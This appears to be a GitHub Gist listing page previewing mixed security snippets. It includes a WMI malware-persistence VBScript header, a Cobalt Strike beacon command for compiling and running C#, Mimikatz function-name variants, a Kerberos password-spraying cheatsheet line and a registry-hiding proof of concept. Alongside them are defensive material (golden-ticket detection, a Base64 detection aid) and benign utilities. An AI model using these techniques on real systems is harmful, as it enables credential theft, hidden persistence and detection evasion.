- RunDll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,0
- RunDll32.exe msrating.dll,RatingSetupUI
mgeeky
/ WMIPersistence.vbs
Last active
June 1, 2022 12:58
Visual Basic Script implementing WMI Persistence method (as implemented in SEADADDY malware and further documented by Matt Graeber) to make the Macro code schedule malware startup after roughly 3 minutes since system gets up.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ' | |
| ' SYNOPSIS: | |
| ' WMI Persistence method as originally presented by SEADADDY malware | |
| ' (https://github.com/pan-unit42/iocs/blob/master/seaduke/decompiled.py#L887) | |
| ' and further documented by Matt Graeber. | |
| ' | |
| ' The scheduled command will be launched after roughly 3 minutes since system | |
| ' gets up. Also, even if the command shall spawn a window - it will not be visible, | |
| ' since the command will get invoked by WmiPrvSE.exe that's running in Session 0. | |
| ' |
jaredcatkinson
/ Get-KerberosTicketGrantingTicket.ps1
Last active
May 8, 2025 13:00
Kerberos Ticket Granting Ticket Collection Script and Golden Ticket Detection Tests
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-KerberosTicketGrantingTicket | |
| { | |
| <# | |
| .SYNOPSIS | |
| Gets the Kerberos Tickets Granting Tickets from all Logon Sessions | |
| .DESCRIPTION | |
| Get-KerberosTicketGrantingTicket uses the Local Security Authority (LSA) functions to enumerate Kerberos logon sessions and return their associate Kerberos Ticket Granting Tickets. |
scotgabriel
/ Windows command line gui access.md
Last active
November 11, 2023 14:53
Common windows functions via rundll user32 and control panel
NaniteFactory
/ dllmain.go
Last active
February 21, 2025 23:33
An implementation example of DllMain() entrypoint with Golang. $ go build --buildmode=c-shared -o my.dll && rundll32.exe my.dll Test
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| //#include "dllmain.h" | |
| import "C" |
brettmillerb
/ PowershellTwitterList.md
Last active
January 8, 2020 10:45
Generate a list of displaynames/handles from Powershell Twitter List
DisplayName Twitterhandle
----------- -------------
fr016 @fr0161
chgopsug @chgopsug
Kevin Bates @_bateskevin
Danny Maertens @maertend33
Julien Reisdorffer @JReisdorffer
Ben Reader @powers_hell 
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $dotnetpath = "/usr/local/share/dotnet/dotnet"; | |
| $sharpgenpath = "/Users/dtmsecurity/Tools/SharpGen/bin/Debug/netcoreapp2.1/SharpGen.dll"; | |
| $temppath = "/tmp/"; | |
| beacon_command_register("sharpgen", "Compile and execute C-Sharp","Synopsis: sharpgen [code]\n"); | |
| alias sharpgen{ | |
| $executionId = "sharpgen_" . int(rand() * 100000); | |
| $temporaryCsharp = $temppath . $executionId . ".cs"; | |
| $executableFilename = $temppath . $executionId . ".exe"; |
itsreallynick
/ mimistack
Created
December 19, 2018 04:28
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 143 function Invoke-Mimidogz | |
| 140 function Invoke-Mimikatz | |
| 29 function Invoke-Mimi | |
| 10 function Chokorun | |
| 7 function Invoke-Ttest | |
| 7 function Invoke-Mimiwormz | |
| 7 function Invoke-Me | |
| 6 function Invoke-Mimiturtle | |
| 6 function Invoke-Mimimi | |
| 5 function output |
TarlogicSecurity
/ kerberos_attacks_cheatsheet.md
Created
May 14, 2019 13:33
A cheatsheet with commands that can be used to perform kerberos attacks
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
Graph-X
/ ironregistry.py
Last active
October 1, 2019 16:46
PoC for hiding things in the registry. My testing hasn't returned any errors when viewing in regedit
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from Microsoft.Win32 import Registry | |
| from time import sleep | |
| rkey = Registry.CurrentUser.CreateSubKey("SOFTWARE\\aatest") | |
| rkey.SetValue(u'\x00 this is a test',u'\x00look at me!') | |
| rkey.Close() | |
| rkey = Registry.CurrentUser.CreateSubKey("SOFTWARE\\aatest") | |
| values = rkey.GetValueNames() | |
| print("We have {0} values.".format(str(len(values)))) | |
| print("The value names returned are: {0}.".format(values[0])) | |
| value = rkey.GetValue(u'\x00 this is a test') |
Neo23x0
/ Base64_CheatSheet.md
Last active
March 31, 2025 08:27
Learning Aid - Top Base64 Encodings Table
| Base64 Code | Mnemonic Aid | Decoded* | Description |
|---|---|---|---|
JAB |
🗣 Jabber | $. |
Variable declaration (UTF-16), e.g. JABlAG4AdgA for $env: |
TVq |
📺 Television | MZ |
MZ header |
SUVY |
🚙 SUV | IEX |
PowerShell Invoke Expression |
SQBFAF |
🐣 Squab favorite | I.E. |
PowerShell Invoke Expression (UTF-16) |
SQBuAH |
🐣 Squab uahhh | I.n. |
PowerShell Invoke string (UTF-16) e.g. Invoke-Mimikatz |
PAA |
💪 "Pah!" | <. |
Often used by Emotet (UTF-16) |